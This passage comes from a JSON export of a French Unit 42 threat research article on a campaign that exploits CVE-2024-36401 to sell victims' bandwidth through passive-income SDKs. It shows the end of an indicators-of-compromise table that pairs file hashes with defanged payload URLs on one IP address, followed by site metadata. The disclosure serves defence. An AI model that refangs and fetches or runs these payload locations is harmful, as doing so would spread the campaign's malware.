monospace;\">fa2687f94955fbdc2c41f1cff8c7df24937aeb942e4d7856bf2ff52ebf2e61aa<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/MFTYFuqKGU\/a401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">663970530e764f91b0be43936331e6c0a93610db6b86c6c4b64de270ae4d4630<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, 
monospace;\">hxxp:\/\/64.226.112[.]52:8080\/cxtpjeM3KU\/a402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">e0b886a39cf098a3c7daa021c7af022b0ceb6edcf3fa49e3c3b8f70b843423c2<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/XEQS3MTzdS\/a593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">9515df36a6d16c0a9fcca680d6b181539d80efd4cda85dacbfb30127a7f11736<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/fAFUQgw7Py\/c401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">491f5af9d29f52a6df026159a8ebd27ee6e27151ea78c4782eb05b2c5d39bfc3<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/0rX20C97S6\/c402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">b381e8355cf3a432e63064897cc7719e8b9c38e91c6151cd1e7aed4cd219a75b<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/LuoHgydq6F\/c593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, 
monospace;\">dec84a568b6393ccd863bb38851a76f54de6f59193660e4b88aa1f941b744469<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/g1Gl1JWEUw\/d401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">33aad585d6280d1921b5f46f8894ee05d426c7751c2133ed5484bf65af587576<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/AORGz7zIzn\/d402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">7620f22a5ed1a8ac2a1da732e55e14a13197b631e5abba6431f88e5cfa3ae2de<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/rKS64mUmF7\/d593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">3d7ac752bb0d54802f2def38f44e10854f70ab5a9a001b5c39ab0531b9ed74bf<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/vbbdG8dpAw\/s401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">ae706c149497c2fc809682e8827996ea3ceb7bcecddd87be7543d1dca4853470<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, 
hxxp:\/\/64.226.112[.]52:8080\/W7lJoMcuOu\/s402">
monospace;\">hxxp:\/\/64.226.112[.]52:8080\/W7lJoMcuOu\/s402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">6dd6751bae92dfa504f0ad5558ab8adfdfba3df5a7f218245627574bfac39f11<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/6mXfFz7ltE\/s593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">357ca4ad31132ad4bd605e3217968819b04d577884a4e9dd760ed0182c4609ed<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/YbEYCqCFVl\/z401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">2b176eb8afa0b089ee8fb072c68c6fdcfe4b2f034c776cc32064f26c0e6c69a3<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/1Vt9KBLEFr\/z402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">97c8ec63766ce63b8ace283928922cfceb7c8f3bc72edcbd255e157a1afb15fe<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/64.226.112[.]52:8080\/09KvYAUSHm\/z593<\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2><a id=\"post-156324-_heading=h.153je835sin4\"><\/a>Further reading<\/h2>\n<ul>\n<li><a 
href=\"https:\/\/commons.apache.org\/proper\/commons-jxpath\/\" target=\"_blank\" rel=\"noopener\">Le composant\u00a0JXPath<\/a> \u2013\u00a0Apache\u00a0Commons<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Une campagne exploite la CVE-2024-36401 pour mon\u00e9tiser discr\u00e8tement la bande passante des victimes gr\u00e2ce \u00e0 l\u2019utilisation de kits de d\u00e9veloppement logiciel (SDK) l\u00e9gitimes permettant de g\u00e9n\u00e9rer des revenus passifs.<\/p>\n","protected":false},"author":278,"featured_media":152575,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[8832,8850],"tags":[9516],"product_categories":[8956,8965,8973,8979,8955,9041,9077,9151],"coauthors":[836,3736,3549,2070],"class_list":["post-156324","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-threat-research-fr","category-vulnerabilities-fr","tag-cve-2024-36401-fr","product_categories-advanced-dns-security-fr","product_categories-advanced-threat-prevention-fr","product_categories-advanced-url-filtering-fr","product_categories-advanced-wildfire-fr","product_categories-cloud-delivered-security-services-fr","product_categories-cortex-fr","product_categories-cortex-xpanse-fr","product_categories-unit-42-incident-response-fr"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.0 (Yoast SEO v27.0) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante<\/title>\n<meta name=\"description\" content=\"Une campagne exploite la CVE-2024-36401 pour mon\u00e9tiser discr\u00e8tement la bande passante des victimes gr\u00e2ce \u00e0 l\u2019utilisation de kits de d\u00e9veloppement logiciel (SDK) l\u00e9gitimes permettant de g\u00e9n\u00e9rer des revenus passifs.\" 
\/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante\" \/>\n<meta property=\"og:description\" content=\"Une campagne exploite la CVE-2024-36401 pour mon\u00e9tiser discr\u00e8tement la bande passante des victimes gr\u00e2ce \u00e0 l\u2019utilisation de kits de d\u00e9veloppement logiciel (SDK) l\u00e9gitimes permettant de g\u00e9n\u00e9rer des revenus passifs.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-21T14:53:32+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-09-10T15:37:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/06_Vulnerabilities_1920x900.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Zhibin Zhang, Yiheng An, Chao Lei, Haozhe Zhang\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. 
-->","yoast_head_json":{"title":"Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante","description":"Une campagne exploite la CVE-2024-36401 pour mon\u00e9tiser discr\u00e8tement la bande passante des victimes gr\u00e2ce \u00e0 l\u2019utilisation de kits de d\u00e9veloppement logiciel (SDK) l\u00e9gitimes permettant de g\u00e9n\u00e9rer des revenus passifs.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/","og_locale":"fr_FR","og_type":"article","og_title":"Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante","og_description":"Une campagne exploite la CVE-2024-36401 pour mon\u00e9tiser discr\u00e8tement la bande passante des victimes gr\u00e2ce \u00e0 l\u2019utilisation de kits de d\u00e9veloppement logiciel (SDK) l\u00e9gitimes permettant de g\u00e9n\u00e9rer des revenus passifs.","og_url":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/","og_site_name":"Unit 42","article_published_time":"2025-08-21T14:53:32+00:00","article_modified_time":"2025-09-10T15:37:33+00:00","og_image":[{"width":1920,"height":900,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/06_Vulnerabilities_1920x900.jpg","type":"image\/jpeg"}],"author":"Zhibin Zhang, Yiheng An, Chao Lei, Haozhe Zhang","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/"},"author":{"name":"Zhibin 
Zhang","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/ef2736b38e39c269e59b3d79094883da"},"headline":"Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante","datePublished":"2025-08-21T14:53:32+00:00","dateModified":"2025-09-10T15:37:33+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/"},"wordCount":4023,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/06_Vulnerabilities_1920x900.jpg","keywords":["CVE-2024-36401"],"articleSection":["Recherche sur les menaces","Vuln\u00e9rabilit\u00e9s"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/","url":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/","name":"Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/06_Vulnerabilities_1920x900.jpg","datePublished":"2025-08-21T14:53:32+00:00","dateModified":"2025-09-10T15:37:33+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/ef2736b38e39c269e59b3d79094883da"},"description":"Une campagne exploite la CVE-2024-36401 pour mon\u00e9tiser discr\u00e8tement la bande passante des victimes gr\u00e2ce \u00e0 l\u2019utilisation de kits de d\u00e9veloppement 
logiciel (SDK) l\u00e9gitimes permettant de g\u00e9n\u00e9rer des revenus passifs.","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#primaryimage","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/06_Vulnerabilities_1920x900.jpg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/08\/06_Vulnerabilities_1920x900.jpg","width":1920,"height":900,"caption":"Pictorial representation of CVE-2024-36401. Digital illustration of a map of North America with interconnected glowing lines and dots symbolizing network connections across the continent."},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/fr\/attackers-sell-your-bandwidth-using-sdks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/"},{"@type":"ListItem","position":2,"name":"Votre connexion, leurs profits des acteurs de la menace d\u00e9tournent des SDK pour mon\u00e9tiser votre bande passante"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/ef2736b38e39c269e59b3d79094883da","name":"Zhibin 
Zhang","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/9213e49ea48b7676660bac40d05c9e3e","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Zhibin Zhang"},"url":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/author\/zhibin-zhang\/"}]}},"_links":{"self":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts\/156324","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/users\/278"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/comments?post=156324"}],"version-history":[{"count":1,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts\/156324\/revisions"}],"predecessor-version":[{"id":156503,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/posts\/156324\/revisions\/156503"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/media\/152575"}],"wp:attachment":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/media?parent=156324"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/categories?post=156324"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/tags?post=156324"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/f
r\/wp-json\/wp\/v2\/product_categories?post=156324"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/fr\/wp-json\/wp\/v2\/coauthors?post=156324"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}